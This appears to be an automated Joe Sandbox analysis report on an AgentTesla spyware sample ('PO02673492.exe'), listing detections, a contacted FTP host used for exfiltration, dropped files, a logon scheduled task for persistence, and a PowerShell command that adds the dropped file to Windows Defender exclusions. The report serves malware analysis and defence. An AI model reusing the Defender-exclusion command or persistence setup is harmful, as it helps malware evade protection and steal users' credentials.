sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->49 51 Tries to steal Mail credentials (via file / registry access) 11->51 53 4 other signatures 11->53 19 conhost.exe 15->19         started        21 conhost.exe 17->21         started        signatures8 process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO02673492.exe44%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe44%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.0.MSBuild.exe.400000.2.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.MSBuild.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      0.0.PO02673492.exe.10a490c.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      8.2.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      0.2.PO02673492.exe.10a490c.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      8.0.MSBuild.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.MSBuild.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      8.0.MSBuild.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://o0afyLkZXwIOZ85BjQfS.net0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      ftp://ftp.pfsbankgroup.com/owo0%Avira URL Cloudsafe
                      http://zGHNrH.com0%Avira URL Cloudsafe
                      http://foo/bar/shell.baml0%Avira URL Cloudsafe
                      http://ftp.pfsbankgroup.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ftp.pfsbankgroup.com
                      37.0.9.166
                      truetrue
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1MSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNSMSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://nsis.sf.net/NSIS_ErrorErrorPO02673492.exe, NzjFNaJxjqA.exe.0.drfalse
                          high
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haMSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://o0afyLkZXwIOZ85BjQfS.netMSBuild.exe, 00000008.00000002.925589921.0000000003296000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO02673492.exe, 00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmp, PO02673492.exe, 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmp, MSBuild.exe, 00000008.00000002.925640222.00000000032DD000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipPO02673492.exe, 00000000.00000002.676785013.00000000046D1000.00000004.00000001.sdmp, MSBuild.exe, 00000008.00000000.672189969.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000008.00000000.672673681.0000000000402000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            ftp://ftp.pfsbankgroup.com/owoMSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://zGHNrH.comMSBuild.exe, 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://foo/bar/shell.bamlPO02673492.exe, 00000000.00000002.675799485.00000000036E8000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://ftp.pfsbankgroup.comMSBuild.exe, 00000008.00000002.925655876.00000000032EB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            37.0.9.166
                            ftp.pfsbankgroup.comNetherlands
                            198301WKD-ASIEtrue

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:532662
                            Start date:02.12.2021
                            Start time:15:48:01
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 12s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:PO02673492.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:21
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@9/9@1/1
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 1% (good quality ratio 0.7%)
                            • Quality average: 41.9%
                            • Quality standard deviation: 38.6%
                            HCA Information:
                            • Successful, ratio: 93%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211
                            • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532662/sample/PO02673492.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            15:48:56API Interceptor2x Sleep call for process: PO02673492.exe modified
                            15:49:01API Interceptor41x Sleep call for process: powershell.exe modified
                            15:49:17API Interceptor751x Sleep call for process: MSBuild.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            37.0.9.16658674932.docGet hashmaliciousBrowse
                            • dell-tv.tk/famzx.exe
                            products.docGet hashmaliciousBrowse
                            • dell-tv.tk/arinzezx.exe
                            P.O-5433ERE.docGet hashmaliciousBrowse
                            • dell-tv.tk/ashlyzx.exe
                            Quotation No. Q07387.docGet hashmaliciousBrowse
                            • dell-tv.tk/templezx.exe
                            Swift Copy TT.docGet hashmaliciousBrowse
                            • dell-tv.tk/xzx.exe
                            Order ID 1426095239.docGet hashmaliciousBrowse
                            • kizitox.ga/mazx.exe
                            PAYMENT2021A0087NOV.docGet hashmaliciousBrowse
                            • kizitox.ga/chriszx.exe
                            Temp Order2.exeGet hashmaliciousBrowse
                            • drossmnfg.com/stallion/index.php
                            Rev_NN doccument.docGet hashmaliciousBrowse
                            • samsung-tv.tk/hussanzx.exe
                            20211122.docGet hashmaliciousBrowse
                            • samsung-tv.tk/famzx.exe
                            PO-20212222.docGet hashmaliciousBrowse
                            • samsung-tv.tk/obizx.exe
                            BANK DETAILS.docGet hashmaliciousBrowse
                            • kizitox.ga/mazx.exe
                            50% TT advance copy.docGet hashmaliciousBrowse
                            • kizitox.ga/ugopoundzx.exe
                            Drawing-FS3589_Surra-Unprice BOQ - Lock file - 28.1.2021.xlsx 788K.docGet hashmaliciousBrowse
                            • kizitox.ga/mpomzx.exe
                            PURCHASE ORDER.docGet hashmaliciousBrowse
                            • kizitox.ga/chriszx.exe
                            DHL AWB TRACKING DETAILS.docGet hashmaliciousBrowse
                            • kizitox.ga/okeyzx.exe
                            items.docGet hashmaliciousBrowse
                            • samsung-tv.tk/arinzezx.exe
                            my orderPDF.exeGet hashmaliciousBrowse
                            • drossmnfg.com/stallion/index.php
                            Order Speficications.docGet hashmaliciousBrowse
                            • samsung-tv.tk/urchzx.exe
                            temp order (2).exeGet hashmaliciousBrowse
                            • drossmnfg.com/stallion/index.php

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            WKD-ASIEukmxWblFcs.exeGet hashmaliciousBrowse
                            • 37.0.10.226
                            Y3NXc8gDf0.exeGet hashmaliciousBrowse
                            • 37.0.10.227
                            g9ykFg9PWc.exeGet hashmaliciousBrowse
                            • 37.0.10.227
                            5wwGGpWOlx.exeGet hashmaliciousBrowse
                            • 37.0.10.227
                            oJ97cSGJwX.exeGet hashmaliciousBrowse
                            • 37.0.10.227
                            8HEHAE34WO.exeGet hashmaliciousBrowse
                            • 37.0.10.227
                            7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exeGet hashmaliciousBrowse
                            • 37.0.10.199
                            QWMSA_Payment_Invoice0939.vbsGet hashmaliciousBrowse
                            • 37.0.10.5
                            Quote Request62781838PDF.exeGet hashmaliciousBrowse
                            • 37.0.10.21
                            PilHb37Gmt.exeGet hashmaliciousBrowse
                            • 37.0.10.244
                            2A9E7BC07BD4EC39C2BEAA42FF35352BBE6400F899F70.exeGet hashmaliciousBrowse
                            • 37.0.10.214
                            0A7D966E66CBD260C909DE1D79038C86A071F2F10A810.exeGet hashmaliciousBrowse
                            • 37.0.10.214
                            58674932.docGet hashmaliciousBrowse
                            • 37.0.9.166
                            6DFD902231E6AA1301C11ECA21F5A29456AA020BFE1EB.exeGet hashmaliciousBrowse
                            • 37.0.10.214
                            B10274561191CEDB0B16D2A69FDCD4E5062EDFE262184.exeGet hashmaliciousBrowse
                            • 37.0.10.214
                            Payment Advice.docGet hashmaliciousBrowse
                            • 37.0.11.230
                            products.docGet hashmaliciousBrowse
                            • 37.0.9.166
                            P.O-5433ERE.docGet hashmaliciousBrowse
                            • 37.0.9.166
                            Quotation No. Q07387.docGet hashmaliciousBrowse
                            • 37.0.9.166
                            0VDGA4mWCE.exeGet hashmaliciousBrowse
                            • 37.0.10.250

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO02673492.exe.log
                            Process:C:\Users\user\Desktop\PO02673492.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):1968
                            Entropy (8bit):5.355630327889458
                            Encrypted:false
                            SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHxvjHKs:iqXeqm00YqhQnouRqjntIxHeqzTwRrqs
                            MD5:5216C7BA51383BFD6FACE8756C452F56
                            SHA1:9E34E791CF09C89CF2A8F0D57D48EC330AD29F93
                            SHA-256:502CE33AFDC9B4C6CCCB5069A7B700064608BEEA4138ED4DFA206F23D33D03B2
                            SHA-512:C1906EAC187E69D5B85384CB62C57713F03D4020DE941D97385DC3F2CAFECBACFD8AEC14E40AB34207ACD0319C368927A0F39F57F3BD135286FC83B207FB4FE4
                            Malicious:true
                            Reputation:moderate, very likely benign file
                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):22284
                            Entropy (8bit):5.602561382248064
                            Encrypted:false
                            SSDEEP:384:atCDqq0AVfc78V0pq6D+owSBKnIjultI2b7Y9gxSJ3xCT1MabZlbAV7APGiZBDIr:e78V6qv4KICltJ7xcQCqfwcbVQ
                            MD5:D6004CD2A44130687B8EC7F7AF84A168
                            SHA1:CFC07CDDE9B101B3F33634785403D537D15A2D0B
                            SHA-256:25B6E53F82F9367638BA8C033D3A51594AD7BF4501A1AB5A8836E35D6E3368AB
                            SHA-512:2C7A84578F9F286FF8C5C6CE8B33C819E19D424A7703C6CC3669CB612ECC33EF4517989D1D6CD617C5F073C1F90F43F226C16159D132983E39A8D632660E94FF
                            Malicious:false
                            Reputation:low
                            Preview: @...e...........|.......h.............y...I..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qk4003uv.ub3.ps1
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vudghvex.lsu.psm1
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\tmp1C7.tmp
                            Process:C:\Users\user\Desktop\PO02673492.exe
                            File Type:XML 1.0 document, ASCII text
                            Category:dropped
                            Size (bytes):1598
                            Entropy (8bit):5.154438998029231
                            Encrypted:false
                            SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTpv
                            MD5:0680BBFCD2956DE9B0E0F1BD657C6492
                            SHA1:10CEFA257F7292A1A609A10CDC378785D41D2261
                            SHA-256:9EF7D5F14A80B99214B697B76183ABC4282E66BF7C5C7206963F23C66CC93051
                            SHA-512:61EE2C225454D0771FA63EC7543CCA996E99A863D87DB2C7C102863447BBF120A980CB14A691D0173F4D9A03264DEE6A0E0816A301057DD31C42FFF11BC0AF3C
                            Malicious:true
                            Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                            C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe
                            Process:C:\Users\user\Desktop\PO02673492.exe
                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):1127936
                            Entropy (8bit):6.737911686408708
                            Encrypted:false
                            SSDEEP:24576:SpYcrbJ7Su2sLWrS2qwK8RHPNS5QH83kRpyPHlarFOk:S62bJYbSE/kBk7UHlEFO
                            MD5:C6AEF3746AF5A5CEC52B4D15CBCBBDE2
                            SHA1:CF88D390D092F28B4E7919E43591BE5FA46A4FDA
                            SHA-256:A1EB5F93145537E3982C8F9855C6B4ADCCB1F8FE8B157BC85115A74C64B4B2B7
                            SHA-512:4FBA6852B8F52CAA53FD847D91F0AB91D47424753C8F488D531B7140D253A6F6C153BE19E729436B1829855A24C32EEE82D777AF0B3391284123A95A5B46E056
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 44%
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?Z.a.................p............... ........@.. ....................................@.................................4...W.................................................................................... ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............4..............@..B................p.......H........C..\K......6...dS..t...........................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....ox...*..{....*.s..
                            C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe:Zone.Identifier
                            Process:C:\Users\user\Desktop\PO02673492.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview: [ZoneTransfer]....ZoneId=0
                            C:\Users\user\AppData\Roaming\p1vruidb.44v\Chrome\Default\Cookies
                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                            Category:dropped
                            Size (bytes):20480
                            Entropy (8bit):0.7006690334145785
                            Encrypted:false
                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                            MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                            SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                            SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                            SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                            Malicious:false
                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\Documents\20211202\PowerShell_transcript.965969.7cVXDn__.20211202154900.txt
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):5793
                            Entropy (8bit):5.415510975294838
                            Encrypted:false
                            SSDEEP:96:BZZujKNqqDo1ZfrZijKNqqDo1ZjiUKjZPjKNqqDo1ZVT66YZb:Fq6
                            MD5:6B05B11E21D27152BA673075F0D9CBE7
                            SHA1:BC9170A22AB761E648F26D1C4CBCD1C735A0C6C1
                            SHA-256:58F3F490306C332A029CBA262F6027AA5E88F5C6ACA3CE89A5F43A03B58CFD40
                            SHA-512:F3CCC5188ECCBB4981287C492C9FE845D00B49DD63FAE10627EB817DC2EDC1841FDF759D05AD556C88FDA4FFE7E5D490E946C7E13D494123797F35D247A12126
                            Malicious:false
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211202154901..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 965969 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe..Process ID: 7112..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211202154901..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe..**********************..Windows PowerShell transcript start..Start time: 20211202155247..Username: computer\user..RunAs User: computer\jo

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):6.737911686408708
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            File name:PO02673492.exe
                            File size:1127936
                            MD5:c6aef3746af5a5cec52b4d15cbcbbde2
                            SHA1:cf88d390d092f28b4e7919e43591be5fa46a4fda
                            SHA256:a1eb5f93145537e3982c8f9855c6b4adccb1f8fe8b157bc85115a74c64b4b2b7
                            SHA512:4fba6852b8f52caa53fd847d91f0ab91d47424753c8f488d531b7140d253a6f6c153be19e729436b1829855a24c32eee82d777af0b3391284123a95a5b46e056
                            SSDEEP:24576:SpYcrbJ7Su2sLWrS2qwK8RHPNS5QH83kRpyPHlarFOk:S62bJYbSE/kBk7UHlEFO
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?Z.a.................p............... ........@.. ....................................@................................

                            File Icon

                            Icon Hash:74ecccdcd4ccccf0

                            Static PE Info

                            General

                            Entrypoint:0x488f8e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x61A55A3F [Mon Nov 29 22:54:55 2021 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:v4.0.30319
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x88f340x57.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x8c088.rsrc
